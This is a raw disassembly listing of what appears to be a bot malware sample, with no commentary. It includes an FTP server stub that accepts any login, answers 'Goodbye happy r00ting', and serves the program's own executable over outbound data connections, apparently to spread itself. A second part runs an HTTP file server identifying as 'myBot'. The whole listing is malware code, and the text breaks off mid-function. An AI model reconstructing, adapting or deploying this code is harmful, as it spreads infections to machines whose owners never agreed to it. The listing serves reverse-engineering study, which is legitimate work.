jz short loc_40556A
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_40555C
jmp short loc_405590
; ---------------------------------------------------------------------------
loc_40556A: ; CODE XREF: sub_405350+20E�j
dec edx
cmp ecx, edx
jnb short loc_40558A
lea eax, [ebp+ecx*4+var_224]
loc_405576: ; CODE XREF: sub_405350+238�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_228]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_405576
loc_40558A: ; CODE XREF: sub_405350+21D�j
dec [ebp+var_228]
loc_405590: ; CODE XREF: sub_405350+218�j
push edi
nop
call near ptr 71AB9639h
jmp loc_405937
; ---------------------------------------------------------------------------
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_AC]
push eax
lea eax, [ebp+var_29C]
push offset aSS_1 ; "%s %s"
push eax
call sub_417FCC
lea eax, [ebp+var_AC]
push offset aUser_1 ; "USER"
push eax
call sub_4177D0
add esp, 18h
test eax, eax
jnz short loc_4055E0
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_405922
; ---------------------------------------------------------------------------
loc_4055E0: ; CODE XREF: sub_405350+281�j
lea eax, [ebp+var_AC]
push offset aPass ; "PASS"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405604
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_405922
; ---------------------------------------------------------------------------
loc_405604: ; CODE XREF: sub_405350+2A5�j
lea eax, [ebp+var_AC]
push offset aSyst ; "SYST"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405628
push esi
push 0Dh
push offset a215Nzmxftpd ; "215 NzmxFtpd\n"
jmp loc_405922
; ---------------------------------------------------------------------------
loc_405628: ; CODE XREF: sub_405350+2C9�j
lea eax, [ebp+var_AC]
push offset aRest ; "REST"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40564C
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_405922
; ---------------------------------------------------------------------------
loc_40564C: ; CODE XREF: sub_405350+2ED�j
lea eax, [ebp+var_AC]
push offset off_42821C
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405670
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_405922
; ---------------------------------------------------------------------------
loc_405670: ; CODE XREF: sub_405350+311�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056AB
lea eax, [ebp+var_334]
push offset aA ; "A"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056AB
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_405922
; ---------------------------------------------------------------------------
loc_4056AB: ; CODE XREF: sub_405350+335�j
; sub_405350+34C�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056E6
lea eax, [ebp+var_334]
push offset aI ; "I"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4056E6
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_405922
; ---------------------------------------------------------------------------
loc_4056E6: ; CODE XREF: sub_405350+370�j
; sub_405350+387�j
lea eax, [ebp+var_AC]
push offset aPasv ; "PASV"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405734
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_124]
rep movsd
push eax
lea eax, [ebp+var_124]
push eax
movsw
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_124]
loc_405724: ; CODE XREF: sub_405350+423�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
loc_40572C: ; CODE XREF: sub_405350+4F3�j
mov edi, [ebp+arg_0]
jmp loc_405925
; ---------------------------------------------------------------------------
loc_405734: ; CODE XREF: sub_405350+3AB�j
lea eax, [ebp+var_AC]
push offset aList ; "LIST"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405775
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax
movsb
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_405724
; ---------------------------------------------------------------------------
loc_405775: ; CODE XREF: sub_405350+3F9�j
lea eax, [ebp+var_AC]
push offset aPort ; "PORT"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_405848
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_417FCC
lea eax, [ebp+var_F8]
push eax
call sub_41791F
mov edi, eax
lea eax, [ebp+var_2D0]
push eax
call sub_41791F
mov [ebp+var_8], eax
push 32h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_417430
push [ebp+var_8]
lea eax, [ebp+var_F8]
push edi
push offset aXX ; "%x%x\n"
push eax
call sub_4173AC
add esp, 44h
lea eax, [ebp+var_F8]
push 10h
push esi
push eax
call sub_417FB5
mov [ebp+var_8], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_4173AC
add esp, 24h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
push [ebp+arg_0]
call ebx ; send
jmp loc_40572C
; ---------------------------------------------------------------------------
loc_405848: ; CODE XREF: sub_405350+43A�j
lea eax, [ebp+var_AC]
push offset aRetr ; "RETR"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_405903
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_8]
lea eax, [ebp+var_48]
push eax
call sub_405953
pop ecx
cmp eax, 1
pop ecx
jnz short loc_4058F9
call sub_4059D0
cmp eax, 1
jnz loc_405925
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+var_48]
push dword_43C64C
push eax
lea eax, [ebp+var_8DC]
push offset unk_428080
push eax
call sub_4173AC
add esp, 14h
cmp [ebp+var_440], esi
jnz short loc_4058EA
push esi
lea eax, [ebp+var_8DC]
push [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
push [ebp+var_6DC]
call sub_40DC10
add esp, 14h
loc_4058EA: ; CODE XREF: sub_405350+575�j
lea eax, [ebp+var_8DC]
push eax
call sub_40C4F7
pop ecx
jmp short loc_405925
; ---------------------------------------------------------------------------
loc_4058F9: ; CODE XREF: sub_405350+52F�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_405922
; ---------------------------------------------------------------------------
loc_405903: ; CODE XREF: sub_405350+50D�j
lea eax, [ebp+var_AC]
push offset aQuit ; "QUIT"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_405925
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_405922: ; CODE XREF: sub_405350+28B�j
; sub_405350+2AF�j ...
push edi
call ebx ; send
loc_405925: ; CODE XREF: sub_405350+3DF�j
; sub_405350+539�j ...
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_417430
add esp, 0Ch
loc_405937: ; CODE XREF: sub_405350+1E0�j
; sub_405350+247�j
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_40547E
jmp loc_405443
; ---------------------------------------------------------------------------
loc_405949: ; CODE XREF: sub_405350+11E�j
push 1
pop eax
loc_40594C: ; CODE XREF: sub_405350+D0�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_405350 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405953 proc near ; CODE XREF: sub_405350+525�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
nop
call near ptr 71AB664Dh
push 0
push 1
push 2
nop
call near ptr 71AB3B91h
push [ebp+arg_0]
mov dword_43C648, eax
mov [ebp+var_10], 2
nop
call near ptr 71AB2BF4h
push [ebp+arg_4]
mov [ebp+var_C], eax
nop
call near ptr 71AB2B66h
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_43C648
nop
call near ptr 71AB406Ah
cmp eax, 0FFFFFFFFh
jnz short loc_4059CB
push dword_43C648
nop
call near ptr 71AB9639h
nop
call near ptr 71AB4428h
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4059CB: ; CODE XREF: sub_405953+60�j
push 1
pop eax
leave
retn
sub_405953 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059D0 proc near ; CODE XREF: sub_405350+531�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
nop
call near ptr 7C80B4CFh
lea eax, [ebp+var_104]
push offset aRb ; "rb"
push eax
call sub_41823A
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_405A67
test byte ptr [esi+0Ch], 10h
jnz short loc_405A4B
push edi
mov edi, 400h
loc_405A13: ; CODE XREF: sub_4059D0+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_418132
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push dword_43C648
nop
call near ptr 71AB428Ah
push 1
nop
call near ptr 7C802442h
test byte ptr [esi+0Ch], 10h
jz short loc_405A13
pop edi
loc_405A4B: ; CODE XREF: sub_4059D0+3B�j
push esi
call sub_4180DC
pop ecx
push dword_43C648
nop
call near ptr 71AB9639h
nop
call near ptr 71AB4428h
push 1
pop eax
loc_405A67: ; CODE XREF: sub_4059D0+35�j
pop esi
leave
retn
sub_4059D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A6A proc near ; DATA XREF: sub_4071BD+333�o
; sub_40F6F1+5763�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_417B70
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_14], esi
call sub_417430
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call dword_4413B8 ; ntohs
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_441438 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_405E55
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_446E1C[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call dword_4413E4 ; bind
cmp eax, 0FFFFFFFFh
jz loc_405E55
push 7FFFFFFFh
push edi
call dword_4413E0 ; listen
cmp eax, 0FFFFFFFFh
jz loc_405E55
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call dword_441454 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_405E55
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_405B41: ; CODE XREF: sub_405A6A+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call dword_4413A0 ; select
cmp eax, 0FFFFFFFFh
jz loc_405E50
xor esi, esi
mov [ebp+var_4], esi
loc_405B77: ; CODE XREF: sub_405A6A+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call dword_4412B0 ; __WSAFDIsSet
test eax, eax
jz loc_405E3B
cmp esi, [ebp+var_C]
jnz short loc_405BF9
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call dword_44144C ; accept
cmp eax, 0FFFFFFFFh
jz loc_405E3B
xor ecx, ecx
test ebx, ebx
jbe short loc_405BCB
lea edx, [ebp+var_134]
loc_405BBF: ; CODE XREF: sub_405A6A+15F�j
cmp [edx], eax
jz short loc_405BCB
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_405BBF
loc_405BCB: ; CODE XREF: sub_405A6A+14D�j
; sub_405A6A+157�j
cmp ecx, ebx
jnz short loc_405BE8
cmp ebx, 40h
jnb short loc_405BE8
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_405BE8: ; CODE XREF: sub_405A6A+163�j
; sub_405A6A+168�j
cmp eax, [ebp+var_8]
jbe loc_405E3B
mov [ebp+var_8], eax
jmp loc_405E3B
; ---------------------------------------------------------------------------
loc_405BF9: ; CODE XREF: sub_405A6A+126�j
mov edi, 1000h
lea eax, [ebp+var_28F0]
push edi
push 0
push eax
call sub_417430
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_417430
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push edi
push eax
push esi
call dword_4413D0 ; recv
test eax, eax
jg short loc_405C8C
push esi
call dword_441450 ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_405E3B
lea eax, [ebp+var_134]
loc_405C4B: ; CODE XREF: sub_405A6A+1EB�j
cmp [eax], esi
jz short loc_405C5C
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_405C4B
jmp loc_405E3B
; ---------------------------------------------------------------------------
loc_405C5C: ; CODE XREF: sub_405A6A+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_405C80
lea eax, [ebp+ecx*4+var_134]
loc_405C6A: ; CODE XREF: sub_405A6A+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_405C6A
loc_405C80: ; CODE XREF: sub_405A6A+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_405E3B
; ---------------------------------------------------------------------------
loc_405C8C: ; CODE XREF: sub_405A6A+1C8�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_417430
lea eax, [ebp+var_28F0]
mov [ebp+arg_0], esi
push eax
call sub_417AF0
add esp, 10h
test eax, eax
jbe loc_405E3B
loc_405CBA: ; CODE XREF: sub_405A6A+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_405D5F
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_405D33
lea eax, [ebp+var_18F0]
push eax
call sub_417AF0
cmp eax, 5
pop ecx
jbe short loc_405D33
mov eax, offset asc_428300 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417980
pop ecx
pop ecx
push eax
call sub_417980
pop ecx
pop ecx
push eax
call sub_41824D
push eax
lea eax, [ebp+var_23C]
push eax
call sub_417A00
add esp, 10h
jmp short loc_405D4A
; ---------------------------------------------------------------------------
loc_405D33: ; CODE XREF: sub_405A6A+27F�j
; sub_405A6A+291�j
lea eax, [ebp+var_18F0]
push offset asc_4282FC ; "\r\n"
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_405D7E
loc_405D4A: ; CODE XREF: sub_405A6A+2C7�j
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_417430
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_405D5F: ; CODE XREF: sub_405A6A+263�j
inc [ebp+arg_0]
lea eax, [ebp+var_28F0]
push eax
inc esi
call sub_417AF0
cmp [ebp+arg_0], eax
pop ecx
jb loc_405CBA
jmp loc_405E3B
; ---------------------------------------------------------------------------
loc_405D7E: ; CODE XREF: sub_405A6A+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_405DC8
lea eax, [ebp+var_134]
loc_405D8A: ; CODE XREF: sub_405A6A+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_405D9B
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_405D8A
jmp short loc_405DCB
; ---------------------------------------------------------------------------
loc_405D9B: ; CODE XREF: sub_405A6A+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_405DBF
lea eax, [ebp+ecx*4+var_134]
loc_405DA9: ; CODE XREF: sub_405A6A+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_405DA9
loc_405DBF: ; CODE XREF: sub_405A6A+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_405DCB
; ---------------------------------------------------------------------------
loc_405DC8: ; CODE XREF: sub_405A6A+318�j
mov esi, [ebp+var_4]
loc_405DCB: ; CODE XREF: sub_405A6A+32F�j
; sub_405A6A+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_405E34
lea eax, [ebp+var_360]
push eax
call sub_417AF0
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_417AF0
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_405E34
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call dword_441454 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_406047
add esp, 14h
jmp short loc_405E3B
; ---------------------------------------------------------------------------
loc_405E34: ; CODE XREF: sub_405A6A+369�j
; sub_405A6A+38F�j
push esi
call dword_441450 ; closesocket
loc_405E3B: ; CODE XREF: sub_405A6A+11D�j
; sub_405A6A+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_405B77
jmp loc_405B41
; ---------------------------------------------------------------------------
loc_405E50: ; CODE XREF: sub_405A6A+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_405E55: ; CODE XREF: sub_405A6A+6A�j
; sub_405A6A+92�j ...
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset unk_4282B8
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_405E9B
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_40DC10
add esp, 14h
loc_405E9B: ; CODE XREF: sub_405A6A+40C�j
lea eax, [ebp+var_8F0]
push eax
call sub_40C4F7
pop ecx
push edi
call dword_441450 ; closesocket
push [ebp+var_254]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
pop edi
pop esi
pop ebx
sub_405A6A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405EC5 proc near ; DATA XREF: sub_406047+246�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_417B70
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_4173AC
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_654]
push eax
call sub_4173AC
xor edi, edi
add esp, 10h
cmp [ebp+var_A4], edi
jz short loc_405F2A
push offset aTextHtml ; "text/html"
jmp short loc_405F2F
; ---------------------------------------------------------------------------
loc_405F2A: ; CODE XREF: sub_405EC5+5C�j
push offset aApplicationOct ; "application/octet-stream"
loc_405F2F: ; CODE XREF: sub_405EC5+63�j
lea eax, [ebp+var_9C]
push eax
call sub_4173AC
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
nop
call near ptr 7C8361EEh
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
nop
call near ptr 7C83632Dh
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_405FA8
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_4173AC
add esp, 24h
jmp short loc_405FC9
; ---------------------------------------------------------------------------
loc_405FA8: ; CODE XREF: sub_405EC5+C4�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_4173AC
add esp, 28h
loc_405FC9: ; CODE XREF: sub_405EC5+E1�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call dword_441408 ; send
cmp [ebp+var_A4], edi
jnz short loc_406009
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_406979
pop ecx
pop ecx
jmp short loc_406026
; ---------------------------------------------------------------------------
loc_406009: ; CODE XREF: sub_405EC5+12C�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_4062F7
add esp, 10h
loc_406026: ; CODE XREF: sub_405EC5+142�j
push [ebp+var_44C]
call dword_441450 ; closesocket
push [ebp+var_B4]
call sub_417174
pop ecx
push edi
nop
call near ptr 7C80C058h
pop edi
pop esi
sub_405EC5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406047 proc near ; CODE XREF: sub_405A6A+3C0�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_417430
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_40607D
push eax
push offset aS_2 ; "\\%s"
jmp short loc_406086
; ---------------------------------------------------------------------------
loc_40607D: ; CODE XREF: sub_406047+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset dword_42433C
loc_406086: ; CODE XREF: sub_406047+34�j
lea eax, [ebp+var_10C]
push eax
call sub_4173AC
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_417AF0
test eax, eax
pop ecx
jbe short loc_406121
mov [ebp+arg_8], 2
loc_4060B1: ; CODE XREF: sub_406047+D8�j
lea eax, [ebp+var_10C]
push eax
call sub_417AF0
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_4060F1
cmp [ebp+esi+var_10C], 25h
jnz short loc_4060F1
cmp [ebp+esi+var_10B], 32h
jnz short loc_4060F1
cmp [ebp+esi+var_10A], 30h
jnz short loc_4060F1
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_40610B
; ---------------------------------------------------------------------------
loc_4060F1: ; CODE XREF: sub_406047+7A�j
; sub_406047+84�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_406101
push 5Ch
pop eax
jmp short loc_406104
; ---------------------------------------------------------------------------
loc_406101: ; CODE XREF: sub_406047+B3�j
movsx eax, al
loc_406104: ; CODE XREF: sub_406047+B8�j
mov [ebp+ebx+var_210], al
loc_40610B: ; CODE XREF: sub_406047+A8�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_417AF0
cmp esi, eax
pop ecx
jb short loc_4060B1
loc_406121: ; CODE XREF: sub_406047+61�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS_2 ; "%s%s"
push eax
call sub_4173AC
lea eax, [ebp+var_314]
push offset asc_4285AC ; "\n"
push eax
call sub_41824D
add esp, 18h
lea eax, [ebp+var_314]
push eax
nop
call near ptr 7C81153Ch
push 1
cmp eax, 10h
pop esi
jz short loc_40616F
cmp eax, 0FFFFFFFFh
jnz short loc_406172
push [ebp+arg_0]
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_40616F: ; CODE XREF: sub_406047+11C�j
mov [ebp+var_4], esi
loc_406172: ; CODE XREF: sub_406047+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_40617F
mov [ebp+var_4], esi
loc_40617F: ; CODE XREF: sub_406047+133�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_4061F9
cmp [ebp+arg_C], edi
jz short loc_4061ED
lea eax, [ebp+var_314]
push offset asc_4285A8 ; "*"
push eax
call sub_417A10
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_4173AC
lea eax, [ebp+var_210]
push eax
call sub_406A36
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_4173AC
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_406248
; ---------------------------------------------------------------------------
loc_4061ED: ; CODE XREF: sub_406047+14F�j
push ebx
loc_4061EE: ; CODE XREF: sub_406047+126�j
call dword_441450 ; closesocket
jmp loc_4062F0
; ---------------------------------------------------------------------------
loc_4061F9: ; CODE XREF: sub_406047+14A�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
nop
call near ptr 7C801A24h
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_406248
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_4173AC
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
nop
call near ptr 7C810A77h
push esi
mov [ebp+var_330], eax
nop
call near ptr 7C809B47h
loc_406248: ; CODE XREF: sub_406047+1A4�j
; sub_406047+1CF�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_428568
push eax
call sub_4173AC
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_416E58
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_446E14[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_405EC5
push edi
push edi
nop
call near ptr 7C810637h
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_446E24[ecx], eax
jz short loc_4062C2
loc_4062B0: ; CODE XREF: sub_406047+279�j
cmp [ebp+var_318], edi
jnz short loc_4062F0
push 5
nop
call near ptr 7C802442h
